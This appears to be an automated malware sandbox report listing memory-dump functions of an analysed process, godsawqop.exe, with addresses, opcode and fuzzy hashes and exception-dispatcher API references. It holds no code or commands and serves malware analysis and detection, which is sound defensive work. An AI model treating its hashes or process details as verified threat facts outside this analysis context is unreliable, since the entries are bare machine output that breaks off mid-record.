Instruction ID: 2054f02efc6df3b9dc24df44db59b34dde111873ed6ab1c1027bb0a98bf0d0a5
Opcode Fuzzy Hash: ec1c9315c909549fc42f7858f68f8f664850c77059dacb0065aa75d64cf10d1b
Instruction Fuzzy Hash: 2BF09621B0D3D18BD72F022915514AF6AA60BCB61472A84BB8945DBA6ACDB54CC187A2

Uniqueness

Uniqueness Score: -1.00%

Function 0031053C, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.459958039.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ae710defc93fabcd3d35173c6cf4fa32ba46e0043dc747977092b403158db25
Instruction ID: 7625d5411b3ae24856a23e2f56dfc8a7e9dc749cc9c1834c1c5ad08bc1cdc868
Opcode Fuzzy Hash: 6ae710defc93fabcd3d35173c6cf4fa32ba46e0043dc747977092b403158db25
Instruction Fuzzy Hash: 2EF0BE2060D3C08FC76F473458210A93F729A872543AA01EBC445DF6B6E9788CC6DB63

Uniqueness

Uniqueness Score: -1.00%

Function 003105D4, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.459958039.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 980eb9573131ce212f281d86816ae9db1ced41fe6c971d9a3962d039f073c155
Instruction ID: 956df9d50beb6f151fcc178d5f252bd780377cdc28190eaf6a962aa4a9f965ef
Opcode Fuzzy Hash: 980eb9573131ce212f281d86816ae9db1ced41fe6c971d9a3962d039f073c155
Instruction Fuzzy Hash: 81F0342024E3E04FCB5B473458651993FB6AE8725434B00EBD095CF2B3DA998CC9CB67

Uniqueness

Uniqueness Score: -1.00%

Function 00311400, Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.459958039.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3bc0da4b365f74b3616925c88106fcf6f4b279451d29d110add76878a1051e79
Instruction ID: f5f6282915ef809490ca300fc8c8f8567dc96940d6c78029a14b3facc4d6143a
Opcode Fuzzy Hash: 3bc0da4b365f74b3616925c88106fcf6f4b279451d29d110add76878a1051e79
Instruction Fuzzy Hash: F6F08236B141618B472D875F90019DAB6BA9BCDF703268036DB05CBB34CE70DC8292D2

Uniqueness

Uniqueness Score: -1.00%

Function 00310E64, Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.459958039.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c1b61649128f3ff75211d286edfd342c50a726f77f816e7669523b69f07d9592
Instruction ID: ae43cbb81b08689e2f5bdcee6d79c9b01977902b272933522add84d9f3fd3f6a
Opcode Fuzzy Hash: c1b61649128f3ff75211d286edfd342c50a726f77f816e7669523b69f07d9592
Instruction Fuzzy Hash: 9AF082357096804FCB2B477A94118E67FB58ECB22031644E7E085CB676CA648C858762

Uniqueness

Uniqueness Score: -1.00%

Function 00310E78, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.459958039.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c22473564f098b8dd187a0bd8e4c7dcefcdf1761c83fc89d6f5d72ebc620057f
Instruction ID: 5511f9b1e569c3dba11d4ccb46cfcc0776aa3253c9d41fe412ec9ad45d88d67f
Opcode Fuzzy Hash: c22473564f098b8dd187a0bd8e4c7dcefcdf1761c83fc89d6f5d72ebc620057f
Instruction Fuzzy Hash: E7E04831B148508B4B2D565ED50586BB3EB9FCD6203658476E549CBB28DE70CC4283F1

Uniqueness

Uniqueness Score: -1.00%

Function 00310DD7, Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.459958039.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a49ba243b50808ef23773ebe064c2e62514ee1c01a110bebf7a6e432eece30b
Instruction ID: 4711c5137b64ce881f304026e227305cd73cef74dcafb5514dd9b688834a9fb6
Opcode Fuzzy Hash: 0a49ba243b50808ef23773ebe064c2e62514ee1c01a110bebf7a6e432eece30b
Instruction Fuzzy Hash: 3CF06D396097808FC71F8B6988508E2BFB5EE9B22031A44EBD045CB673D6A48D85CB61

Uniqueness

Uniqueness Score: -1.00%

Function 003119DC, Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.459958039.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51bbac4a25a0b515c7dc897d3891053ee38a108f29e68a1589eb7b99d57e4d6f
Instruction ID: 21e19404d50666630380cd093d1cce7db0fb94c403d5094723a0f1ea8e9f0f8f
Opcode Fuzzy Hash: 51bbac4a25a0b515c7dc897d3891053ee38a108f29e68a1589eb7b99d57e4d6f
Instruction Fuzzy Hash: DBE06D3400A3C18FC74B463408B00E63F31EE4B6097A901DA81D19B5A3EA25484BC7A3

Uniqueness

Uniqueness Score: -1.00%

Function 00310620, Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.459958039.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f467bdc9c66e2511f7dfffb3ff8f6e85eb293f236499a7e2095f4787357c65d
Instruction ID: f01e61e793611a1cb5c5f0e1d31aecd805c816cff568315afa85ac7d52ac20f2
Opcode Fuzzy Hash: 2f467bdc9c66e2511f7dfffb3ff8f6e85eb293f236499a7e2095f4787357c65d
Instruction Fuzzy Hash: A1E01A2164E3C04FDB6F4B744C250953F719E9720879B04E7C485CF9A7E9698C99C723

Uniqueness

Uniqueness Score: -1.00%

Function 003106B8, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.459958039.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6fcf03b12f836cf92c9cad6487a2b7084723257af593ae09295fc49049d78df2
Instruction ID: f998c99c7f6cd6323f3840b3f625ff14add5d3ce963d6f38fa24fcba53346064
Opcode Fuzzy Hash: 6fcf03b12f836cf92c9cad6487a2b7084723257af593ae09295fc49049d78df2
Instruction Fuzzy Hash: 6CE04F1061D7C10FCB6F5624086016A3E7A9AD735479A80EB8841CB0ABCB548D95C323

Uniqueness

Uniqueness Score: -1.00%

Function 00310DF0, Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.459958039.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e661439bfd99d3d5f1c1dc88fed1a73df607487014f48184d633abc5e059af48
Instruction ID: ebc48f9eabda6da7324090591f4205d302c5e3e75c2538296865ed4b59eb3926
Opcode Fuzzy Hash: e661439bfd99d3d5f1c1dc88fed1a73df607487014f48184d633abc5e059af48
Instruction Fuzzy Hash: 9AE0C235B109158B8B1C8A5FC400897B3DAAFED62032580BA9009CB735EEB1CC9187A1

Uniqueness

Uniqueness Score: -1.00%

Function 00310588, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.459958039.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7bcb40820c4044969d232cb839693281ed6d3eebb125a9e42a0c8e81dbd3bac0
Instruction ID: a7b28423d130974a835cbc12a4d00cba940f4e92e3523da5807f00d5994d66c5
Opcode Fuzzy Hash: 7bcb40820c4044969d232cb839693281ed6d3eebb125a9e42a0c8e81dbd3bac0
Instruction Fuzzy Hash: F6E04F2014D3C04FC71B8B3008641943F726F47144B6A00EBC094DF5A7D4698888CB17

Uniqueness

Uniqueness Score: -1.00%

Function 00310FE0, Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.459958039.0000000000310000.00000040.00000001.sdmp, Offset: 00310000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fae3c71ee759ece3bb125a7ecaa8ec08533de49b7863a53c502168c904e434eb
Instruction ID: 53c10a24e502e1bec6b53b2ed1c882bf5ca56ef3fe11cb54b36c338401bb85b8
Opcode Fuzzy Hash: fae3c71ee759ece3bb125a7ecaa8ec08533de49b7863a53c502168c904e434eb
Instruction Fuzzy Hash: 4FD05E36B541418F4B3E9A5DD012865B3A7AFC96143258064A0058BF38DF70DC82C681

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00510048, Relevance: 4.4, Instructions: 4447COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.460113159.0000000000510000.00000040.00000001.sdmp, Offset: 00510000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28e5d676bca4ce9e5531695075541f8f88221496b723c1f2964efb4790d2dddb
Instruction ID: 26d2b3fa2139bfea48db67008e2dd9be38c6afa2c33145962cdf96551adbc7df
Opcode Fuzzy Hash: 28e5d676bca4ce9e5531695075541f8f88221496b723c1f2964efb4790d2dddb
Instruction Fuzzy Hash: B1932670E05618CFC714EF28EA9569DBBB1FB89305F0084E9D088A7360EB356E98DF51

Uniqueness

Uniqueness Score: -1.00%

Function 00500048, Relevance: 4.4, Instructions: 4439COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.460104250.0000000000500000.00000040.00000001.sdmp, Offset: 00500000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07f22a49d936ecd96689776fff2f097bd3396eb53f0594e4c5dafbf81e41b054
Instruction ID: 8d3a274c01d8e543b051b6de11f61c5de556d26a8943ecd9b357d5465f66e00d
Opcode Fuzzy Hash: 07f22a49d936ecd96689776fff2f097bd3396eb53f0594e4c5dafbf81e41b054
Instruction Fuzzy Hash: CC932870E056188FC714EF28ED9969EBBB1FB88305F0085E9D448A7760EB346E98DF51

Uniqueness

Uniqueness Score: -1.00%

Function 0080B81F, Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.460497232.0000000000800000.00000040.00000001.sdmp, Offset: 00800000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ddd3a5521463cd0bd3f4f7cb0fd4f4e52f8f1f8d47ccfca0801a3321998ebc0f
Instruction ID: 77d74c9c9f4feb3c92e9f358912908ff1df4bced6705b8aad3b9e8e55a5e4712
Opcode Fuzzy Hash: ddd3a5521463cd0bd3f4f7cb0fd4f4e52f8f1f8d47ccfca0801a3321998ebc0f
Instruction Fuzzy Hash: C7112423C8C0F446EE127F7C64C89CE7B58AE951AB3CA08D2C682FE85ADB14C451C7D1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: godsawqop.exe PID: 2236 Parent PID: 2692 godsawqop.exeCOMMON

Executed Functions

Function 002D7AA8, Relevance: 4.0, APIs: 2, Instructions: 953COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002D84E4

Memory Dump Source

Source File: 00000005.00000002.723908147.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: aeb7c0696de44d2fb2201d83cc44b3cb66a1b205cbcbe27bad6c26a57cb006f1
Instruction ID: d1f34475ca408ff4a99d9d94b0e472edfa8ceec84b502c4ddf708f64033458e5
Opcode Fuzzy Hash: aeb7c0696de44d2fb2201d83cc44b3cb66a1b205cbcbe27bad6c26a57cb006f1
Instruction Fuzzy Hash: 71A22374A14228CFDB65AF30C8586DDB7B6BF88305F2085EAD50AA3350EB349E85CF55

Uniqueness

Uniqueness Score: -1.00%

Function 002D7AC9, Relevance: 3.6, APIs: 2, Instructions: 631COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002D84E4

Memory Dump Source

Source File: 00000005.00000002.723908147.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 6a5b3daf6a399f3dcf8df31f8a02c63ad24626f15a4a4f2636062c4be96de1e1
Instruction ID: 6286e0f73049201e3c709170add53ada00f108a3f8c6320cd7efa6bc9510e89f
Opcode Fuzzy Hash: 6a5b3daf6a399f3dcf8df31f8a02c63ad24626f15a4a4f2636062c4be96de1e1
Instruction Fuzzy Hash: C1621374A14218CFDB649F30C8586DDB7B6BF88305F2085EAD50AA3350EB749E86CF65

Uniqueness

Uniqueness Score: -1.00%

Function 002D7B0E, Relevance: 3.6, APIs: 2, Instructions: 624COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002D84E4

Memory Dump Source

Source File: 00000005.00000002.723908147.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: d95c93fc90f8c4d6708ef3a69f8f6dd61a71dc172d4636396ee2b242e81cd5a4
Instruction ID: 56339f049b37ebc1b7da707c6026a24903633a335859cca45a7ae62e1b526713
Opcode Fuzzy Hash: d95c93fc90f8c4d6708ef3a69f8f6dd61a71dc172d4636396ee2b242e81cd5a4
Instruction Fuzzy Hash: BD521374A14218CFDB649F30C8586DDB7B6BF88305F2085EAD50AA3350EB749E86CF65

Uniqueness

Uniqueness Score: -1.00%

Function 002D7B53, Relevance: 3.6, APIs: 2, Instructions: 617COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002D84E4

Memory Dump Source

Source File: 00000005.00000002.723908147.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: a9dbc6dff904b937cc72b2025d5a0cc51898c4b0caa8a26df92295ce128ef045
Instruction ID: ad2d5fb8c2f03d543074a10c50d0999f44602931f0cf6116a430fa5125cd1fc0
Opcode Fuzzy Hash: a9dbc6dff904b937cc72b2025d5a0cc51898c4b0caa8a26df92295ce128ef045
Instruction Fuzzy Hash: D5520374A14218CFDB649F30C85869DB7B6BF88205F2085EAD50AA3350EB749E86CF65

Uniqueness

Uniqueness Score: -1.00%

Function 002D7B98, Relevance: 3.6, APIs: 2, Instructions: 610COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002D84E4

Memory Dump Source

Source File: 00000005.00000002.723908147.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 3629c02ffbe6a407d7905511c82e3fd02b08a362f41b08e00f3ea82f3fdb1c2a
Instruction ID: b35f26ede899ff6facd7a3437eeb009c6e95ab0c8d112a9dec3870f0369cbef4
Opcode Fuzzy Hash: 3629c02ffbe6a407d7905511c82e3fd02b08a362f41b08e00f3ea82f3fdb1c2a
Instruction Fuzzy Hash: A9520374A14218CFDB649F30C8586DDB7B6BF88305F2085EAD50AA3350EB749E86CF65

Uniqueness

Uniqueness Score: -1.00%

Function 002D7BDD, Relevance: 3.6, APIs: 2, Instructions: 601COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002D84E4

Memory Dump Source

Source File: 00000005.00000002.723908147.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 371d29849bce8b3dd55b2549e2fff74843a4bc5f72c9b97d940d64e1a3a2f77a
Instruction ID: dd9564da93970967e250a71e9c83f1021a51d062f56f61916fef677031d30af5
Opcode Fuzzy Hash: 371d29849bce8b3dd55b2549e2fff74843a4bc5f72c9b97d940d64e1a3a2f77a
Instruction Fuzzy Hash: DB520274A14218CFDB649B30C85869DB7B6BF88205F2085EAD50AA3350EB749E86CF65

Uniqueness

Uniqueness Score: -1.00%

Function 002D7C19, Relevance: 3.6, APIs: 2, Instructions: 596COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002D84E4

Memory Dump Source

Source File: 00000005.00000002.723908147.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: d1ab2627fae13c90209c9afcbea2ded952535e8d60fa542c3eef7174151e2490
Instruction ID: ee332c4525e692b2f1a1db27c0f0457a5e3abbe7657643e8975e89b9e0d4387b
Opcode Fuzzy Hash: d1ab2627fae13c90209c9afcbea2ded952535e8d60fa542c3eef7174151e2490
Instruction Fuzzy Hash: AF521274A15218CFDB649F30C8586DDB7B6BF88205F2085EAD50AA3350EF749E86CF64

Uniqueness

Uniqueness Score: -1.00%

Function 002D7C5E, Relevance: 3.6, APIs: 2, Instructions: 589COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002D84E4

Memory Dump Source

Source File: 00000005.00000002.723908147.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 13465c521d873e9b743c459b9c40196d4ce5b3e252c7935c9005ef712fc127d3
Instruction ID: 26d0b3e3484c3afa1368162b1fa680e59d87ce7502f4c6295ef276ca377e4d9a
Opcode Fuzzy Hash: 13465c521d873e9b743c459b9c40196d4ce5b3e252c7935c9005ef712fc127d3
Instruction Fuzzy Hash: AE521274A14228CFDB649F30C8586DDB7B6BF88205F2085EAD50AA3350EF749E86CF55

Uniqueness

Uniqueness Score: -1.00%

Function 002D7CA3, Relevance: 3.6, APIs: 2, Instructions: 582COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002D84E4

Memory Dump Source

Source File: 00000005.00000002.723908147.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 1caaef0c55645f896e7e9d47764ca2c5b91bdf05e745a81daf6280161a2cac1c
Instruction ID: 7c8dac2001f725165d90ce05892b3b594d191158f1e0fe538ca351c5e68e5b1e
Opcode Fuzzy Hash: 1caaef0c55645f896e7e9d47764ca2c5b91bdf05e745a81daf6280161a2cac1c
Instruction Fuzzy Hash: 94521274A15218CFDB649F30C8586DDB7B6BF88205F2085EAD50AA3350EF749E86CF54

Uniqueness

Uniqueness Score: -1.00%

Function 002D7CE8, Relevance: 3.6, APIs: 2, Instructions: 575COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002D84E4

Memory Dump Source

Source File: 00000005.00000002.723908147.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: cd6c42eaa9eb6f30dcb0150d3f3fab5382182a355734822136c1408b06455057
Instruction ID: bf43c94ae0eab8064db4e0cd1723056384330c867357c2d22e234f82eaf25de1
Opcode Fuzzy Hash: cd6c42eaa9eb6f30dcb0150d3f3fab5382182a355734822136c1408b06455057
Instruction Fuzzy Hash: BA421274A14218CFDB649F30C85869DB7B6BF88305F2085EAD50AA3350EF749E86CF54

Uniqueness

Uniqueness Score: -1.00%

Function 002D7D2D, Relevance: 3.6, APIs: 2, Instructions: 568COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002D84E4

Memory Dump Source

Source File: 00000005.00000002.723908147.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 6ca8ac33ed1ca093d6d2e4c2d07d97e0689d46026b95571ce5d12b6ce7d300e4
Instruction ID: 711895e79b3ac6b800bb750deaaf7c05f0321548f9cbc26b5e744ab119221853
Opcode Fuzzy Hash: 6ca8ac33ed1ca093d6d2e4c2d07d97e0689d46026b95571ce5d12b6ce7d300e4
Instruction Fuzzy Hash: CA421274A15218CFDB649F30C8586DDB7B6BF88205F2085EAD50AA3350EF749E86CF64

Uniqueness

Uniqueness Score: -1.00%

Function 002D7D72, Relevance: 3.6, APIs: 2, Instructions: 561COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002D84E4

Memory Dump Source

Source File: 00000005.00000002.723908147.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 8a6492959c22936099c80c3374b381a2fbec25b747c701561bd084730cdb230b
Instruction ID: 681304f7a4306441043db678774cd43a3cbf38d35bd8f7afd11eef4fa7b926c2
Opcode Fuzzy Hash: 8a6492959c22936099c80c3374b381a2fbec25b747c701561bd084730cdb230b
Instruction Fuzzy Hash: BA421374A15218CFDB649F30C8586DDB7B6BF88305F2085AAD50AA3350EF749E86CF54

Uniqueness

Uniqueness Score: -1.00%

Function 002D7DB7, Relevance: 3.6, APIs: 2, Instructions: 554COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002D84E4

Memory Dump Source

Source File: 00000005.00000002.723908147.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 73310a2b629aa03d88599740819a501be4ef175f7c8468942e7be72ddb782003
Instruction ID: 394e0a8fad2aad4eb626773df47834f405401c978220835ea3ec1c5185aced38
Opcode Fuzzy Hash: 73310a2b629aa03d88599740819a501be4ef175f7c8468942e7be72ddb782003
Instruction Fuzzy Hash: DA421374A15218CFDB649F30C8586DDB7B6BF88305F2085AAD50AA3350EB749E86CF54

Uniqueness

Uniqueness Score: -1.00%

Function 002D83A3, Relevance: 3.3, APIs: 2, Instructions: 346COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002D84E4
KiUserExceptionDispatcher.NTDLL ref: 002D8836

Memory Dump Source

Source File: 00000005.00000002.723908147.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: c88599cb408e85442f445bdd0ced5ba1e88dd54263dfac4a9af7fd7dc1bff85e
Instruction ID: f2d452079a9ef90d26b5341c3a57f8b60640b53aca7779d046feb08e5e6845c1
Opcode Fuzzy Hash: c88599cb408e85442f445bdd0ced5ba1e88dd54263dfac4a9af7fd7dc1bff85e
Instruction Fuzzy Hash: 96F125B4A15218CFDB649F20C8546DCB7B6BF48205F2085EAD50AA3350EF749E86CF65

Uniqueness

Uniqueness Score: -1.00%

Function 002D83E8, Relevance: 3.3, APIs: 2, Instructions: 339COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002D84E4
KiUserExceptionDispatcher.NTDLL ref: 002D8836

Memory Dump Source

Source File: 00000005.00000002.723908147.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 7d844461dce7af355cefdbcea12025d62597ee7452daa8813285906b03c79315
Instruction ID: df9387a5154812af05d5e1ed04bf674489bac64124a83cd79948c9eb8ede2f73
Opcode Fuzzy Hash: 7d844461dce7af355cefdbcea12025d62597ee7452daa8813285906b03c79315
Instruction Fuzzy Hash: 50F126B4915218CFDB649F20C8546DCB7B6BF88305F2084EAD50AA3350EF749E86CF65

Uniqueness

Uniqueness Score: -1.00%

Function 002D842D, Relevance: 3.3, APIs: 2, Instructions: 332COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002D84E4
KiUserExceptionDispatcher.NTDLL ref: 002D8836

Memory Dump Source

Source File: 00000005.00000002.723908147.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: a2b11c1f043d3fb1771564409c17e6138378c09076baa17abd9d7e0af25f7b30
Instruction ID: 545b84d2aca4790ff82d18faa4528cd9b11c87aa16a187769716d622529bc709
Opcode Fuzzy Hash: a2b11c1f043d3fb1771564409c17e6138378c09076baa17abd9d7e0af25f7b30
Instruction Fuzzy Hash: E6F126B4A15218CFDB649F20C8546DCB7B6BF88305F2084EAD50AA3750EF749E86CF65

Uniqueness

Uniqueness Score: -1.00%

Function 002D8475, Relevance: 3.3, APIs: 2, Instructions: 325COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002D84E4
KiUserExceptionDispatcher.NTDLL ref: 002D8836

Memory Dump Source

Source File: 00000005.00000002.723908147.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 9135dedd5183df42056cfaeb050e6db646a9e0513a34024b8894bb9566dfaa4c
Instruction ID: 84202cdaba21aabf708f4dc23f92d6d828a6b4ed36ecad9f8d6348c6e639118b
Opcode Fuzzy Hash: 9135dedd5183df42056cfaeb050e6db646a9e0513a34024b8894bb9566dfaa4c
Instruction Fuzzy Hash: 95E136B4A15218CFDB649F20C8546DCB7B6BF88305F2084EAD50AA3350EF749E86CF65

Uniqueness

Uniqueness Score: -1.00%

Function 002D84BD, Relevance: 3.3, APIs: 2, Instructions: 318COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002D84E4
KiUserExceptionDispatcher.NTDLL ref: 002D8836

Memory Dump Source

Source File: 00000005.00000002.723908147.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: b647d7178f343f27a8a3e1ebe449aeb05d1bc291c8ddcfd22bc4d9cb0b1b5bbd
Instruction ID: b0732c2908d813ea3e3c9d4ef8765e22447f18644915c4d3028ec8d067f16287
Opcode Fuzzy Hash: b647d7178f343f27a8a3e1ebe449aeb05d1bc291c8ddcfd22bc4d9cb0b1b5bbd
Instruction Fuzzy Hash: 53E137B4A14218CFDB649F20C8546DCB7B6BF88305F2085EAD509A3350EF749E86CF65

Uniqueness

Uniqueness Score: -1.00%

Function 002D8505, Relevance: 1.8, APIs: 1, Instructions: 311COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002D8836

Memory Dump Source

Source File: 00000005.00000002.723908147.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 6d5a39b21a58cb462cd6eb6bd0c6d362af9d7479638fcfb88e5c0b8ee8b5e565
Instruction ID: 5417356094fb02f77d1a05c17fe0e80718519bd4acb28642c204d764c9780f41
Opcode Fuzzy Hash: 6d5a39b21a58cb462cd6eb6bd0c6d362af9d7479638fcfb88e5c0b8ee8b5e565
Instruction Fuzzy Hash: 9BE137B4A14218CFDB649F20C8546ECB7B6BF88305F2084EAD509A3350EF749E86CF65

Uniqueness

Uniqueness Score: -1.00%

Function 002D854D, Relevance: 1.8, APIs: 1, Instructions: 304COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002D8836

Memory Dump Source

Source File: 00000005.00000002.723908147.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: efa03d1dadcdf3b452fc741b9c65fd3ddab42b22317702b59698d19936451d38
Instruction ID: c747fa02a99acaac72bad5a999880cbc9780914873117682c657cbdcb94d3583
Opcode Fuzzy Hash: efa03d1dadcdf3b452fc741b9c65fd3ddab42b22317702b59698d19936451d38
Instruction Fuzzy Hash: 25E137B4A14218CFDB649F20C8546EDB7B6BF88305F2084EAD509A3350EF749E86CF65

Uniqueness

Uniqueness Score: -1.00%

Function 002D85AB, Relevance: 1.8, APIs: 1, Instructions: 293COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002D8836

Memory Dump Source

Source File: 00000005.00000002.723908147.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 4888d05d8dd97555c0bca8362799bf1188824c9976441c0de6165aa2bcb235f1
Instruction ID: 37bca2f58b76f16fd1c993c5db45fbc3d27691f7deaa7d7461424da44e3ba705
Opcode Fuzzy Hash: 4888d05d8dd97555c0bca8362799bf1188824c9976441c0de6165aa2bcb235f1
Instruction Fuzzy Hash: 6BD138B4A05218CFDB649F30C8546ECB7B2BF88205F2084EAD509A3350EF749E86CF65

Uniqueness

Uniqueness Score: -1.00%

Function 002D880F, Relevance: 1.7, APIs: 1, Instructions: 230COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 002D8836

Memory Dump Source

Source File: 00000005.00000002.723908147.00000000002D0000.00000040.00000001.sdmp, Offset: 002D0000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: e9ab2af116acad88b2db5f750754393ab3abfb2696be9cc80a4acb4083f506f4
